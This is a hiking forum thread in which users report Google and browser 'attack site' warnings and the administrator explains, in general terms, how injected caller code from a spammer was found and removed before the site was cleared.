All day, when I try to reach the forum, I get a blocked site, saying Google Analytics has decided the forum is a malicious site. Is anyone else seeing this? I've been skipping past the warning, but I have to do it for every click, and it's a real hassle.

Thanks

Scott

Yes, I too see these warnings. I'm not sure by what metrics Google analyzes websites but I figured it may just be based off of advertisers that track users across domains via cookies.

However, this website doesn't have advertising. So perhaps it's been compromised and malicious code was injected into the site. After all, this site does implement well known forum software with published bug exploits.

If you follow the link "Why was this site blocked?" it says there were some number of malware/trojan horses found...


I think Tim & Neil have to contact Google to have the site removed from the bad list...

I get the same thing, and still do.

"Reported Attack Site!

This web site at www.adkhighpeaks.com has been reported as an attack site and has been blocked based on your security preferences.

Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners."

It's not my security preference, because it works fine with IE, and my google is set to default setting.

Scroll down guys:

http://www.adkhighpeaks.com/forums/showthread.php?t=3104

At least there is info on there.

Jay

Ah, that's good news then. I was afraid that someone had hit this forum with some vBulletin bug exploit.

My band's old website ran a fairly known engine that was hit with a silly XSS exploit. It injected javascript into user submitted content viewable from the front page, which caused visitors to automatically be redirected to another website. It wasn't dangerous, just mischievous.

"Reported Attack Site!

This web site at www.adkhighpeaks.com has been reported as an attack site and has been blocked based on your security preferences.

Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners."

It's not my security preference, because it works fine with IE, and my google is set to default setting.

ADKHighpeaks is NOT and Attack site. It's explained in the link above by Jay H. I am in the process of working we google on identifying the location of the "suspect" code. Last time it turned out to be some BS <iFrame> tag that was legitimate but the googlebot flagged it anywhere. So far the flagged area is in an old portion of the site totally unaffiliated with the forums.

THERE IS NO SECURITY RISK TO THE FORUM USER.

a BIG PITA that will take a few weeks to sort out, but we will.

ADKHighpeaks is NOT and Attack site. It's explained in the link above by Jay H. I am in the process of working we google on identifying the location of the "suspect" code. Last time it turned out to be some BS <iFrame> tag that was legitimate but the googlebot flagged it anywhere. So far the flagged area is in an old portion of the site totally unaffiliated with the forums.

THERE IS NO SECURITY RISK TO THE FORUM USER.

a BIG PITA that will take a few weeks to sort out, but we will.

I know that, I read the post. I just copy and paste the message appare in my browser as if it might be of any help for you guys to get it resolved.

I found it................. After a couple hours, and couple beers. I found the offending code............. (after reviewing like 4000 lines of it :rolleyes: ). Long after my eyes started bleeding, I found it and removed it from the site. We are now good to go at this point. I've notified google, who will, I'm sure, take their SWEET A$$ time removing us from the bad boy list. :rolleyes:

Technology is good, and bad......... all at the same time. Grrrrrrrr. I hate that crap.

Anyhow, in due time, we'll be removed............. ONCE AGAIN. Surf without fear.

FYI. I try to surf the site from work and they use the Barracuda firewall software and this site is blocked there as well.

I'm not sure how barracuda gets their lists of "bad" sites, but you might want to drop them a line as well when things are fixed up...

Actually, for those that use virus software, might have noticed the issue. There was multiple lines of bad code in there (Not in the forums area) that needed to be cleansed.

They are now and google will do another review and update the warning page. Not sure how long that process takes (it took 1 month before). I'm working with my ISP to increase security.

Thanks Tim -

Still an issue with Firefox, but IE7 is fine...I guess we wait for Google to deem us worthy of their time.


Scott

I never got the message until I upgraded to FF3 now I get hammered with it. I couldn't even get post through the normal options and can only get it to work with the "quick reply". I'm sure you can turn the option off, but I'm to lazy when I'm not hiking.

Come to find out, I did get hit with a Trojan horse. It was an innocuous one, that did no damage (the damaging .exe part was killed by the host before getting onto the server) however the "caller" codes did get inserted, so it comes up.

Working with the host. The whole site has now been swept and there should no longer be and associated FF issues though forum (let me know via PM if there is). Google will take their time.

The site is safe to use though at this point. Thanks for your patience.

For now, FF still tries to block it, but if you go to Tools-Options-Security you can uncheck the box "Alert me to attack sites"...

Yeah now sure why that is. The forums has been sweep manually and electronically and are clean. I've email...... google about 30 times and requested they review my site. No response yet.

I received the "all clear" from my ISP on the 9th, and the site is totally clean. I'm on now with FF3 and get NO MESSAGES. If you are still getting alerts, hit refresh, your probably surfing through a "cached" page. FF, unlke google looks for codes (general <iframe> or script callers) and when they find them, they flag the site and show the user the warning. Some uses of <iframe> are legit, which is why you get a choice to override it.

I learned A LOT through this process and it should help for the future. I've always been a full disclosure guy, so here is the full deal.

On June 30, one of the million "porno" spammers, hit the site and was "granted" membership, one in, they attempted to infect my ISP home folder with a Trojan hourse virus that would distribute porn silently to the masses on the internet (not forum users, it just tried to use my server as a intermediary (like a parasite). It's apparently a two part process. 1) it inserts 2 lines of code into all site index files that "call" out to a secondary file that attempts to place in the folder as well (part 2 in the process) this 2 executable file does the work of the virus. My ISP, detected the second part and killed the upload, the the executable part never made it (those files require authorization), but because the inserting of the codes just looks like "me updating files", it allows it.

What happens is that there are all these "caller" codes that call out to nothing (cause the 2nd process didn't take) on many of my pages. Fast forward to FF and IE viewers coming in and those sites see the "caller codes" and say "oh oh" and warn the user. One they are removed, the browsers no longer see the code and allow it.

Google, on the other hand is different..... they send out bots that periodically surf around and when the hit these codes, it flags the site as "harmful" and notifies me. Now that the site has been cleansed, I put a re-request to google and invite the googlebots back to sweep the site. Well these thing are just dummy that stumble around blindly looking for stuff so when the "stumble" back in, they'll report there finding, which google will then verify with a google bombbot that we hunt for the codes and if they are all gone, they remove us from the list..... they say it's a 72 hrs process but we're close to that already and still no update. I do notice that AOL.com.uk which was successfully targeted and infected the same day (from the same source), is already off the "bad boy" list, so I guess it's a matter of who ya know. :rolleyes:

In spending lots of "quality" time with my ISP Tech Support folks, this is something that is ALWAYS occurring (like I said aol uk and 650 others sites got nailed at the same time). My ISP assures me that no users were at risk because this virus 1) just uses us as an intermediary "spread the porno" Gospel and 2) the important exectutable portion never got activated.

The object is to catch it at the door, cuz once it start writing codes, it's a pain to sweep (I went through about 10,000 lines of code in 54 differents files to "erase the offending lines"). That is my understanding of what happened and how it was explained to me (last night from 11 PM to 1 AM).

A big PITA. Sorry for any inconvenience and there shouldn't be trouble and google will get around to us at some point.

Look on the bright side, our success and # of hits this site generates now makes us attractive to the world's internet porno venders :rolleyes:

Gee, whoever thought "let's start a fun little BB and chit chat among friends" would turn into me being the "code police" sniffing out porno hackers :razz: :D

Google has seen fit to sound the "ALL CLEAR (http://www.google.com/search?source=ig&hl=en&rlz=1G1GGLQ_ENUS247&q=adkhighpeaks&btnG=Google+Search)"